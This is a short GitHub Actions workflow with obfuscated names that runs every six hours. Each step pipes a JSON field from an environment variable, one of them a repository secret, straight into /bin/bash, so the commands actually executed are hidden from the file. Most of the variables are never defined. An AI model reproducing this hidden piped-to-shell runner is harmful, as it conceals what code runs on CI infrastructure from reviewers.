name: xiaoshouya4617
on:
  workflow_dispatch:
  schedule:
    - cron: '3 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaoshouya4617
        env:
          pdeqn53: ${{ secrets.pdeqn53 }}
        run: |
          echo $pdeqn53 | jq -r .urdg5382 | /bin/bash
          echo $xou07 | jq -r .coy9074 | /bin/bash
          echo $tyt7 | jq -r .o79424 | /bin/bash
          echo $gkioz571 | jq -r .zb74 | /bin/bash
          echo $us0 | jq -r .dxbwm90436 | /bin/bash
          echo $pqz61 | jq -r .npa427 | /bin/bash
          echo $hl69976 | jq -r .qpar81 | /bin/bash
          echo $lmlh7 | jq -r .nio38672 | /bin/bash
          echo $rkupt673 | jq -r .ohwz46973 | /bin/bash

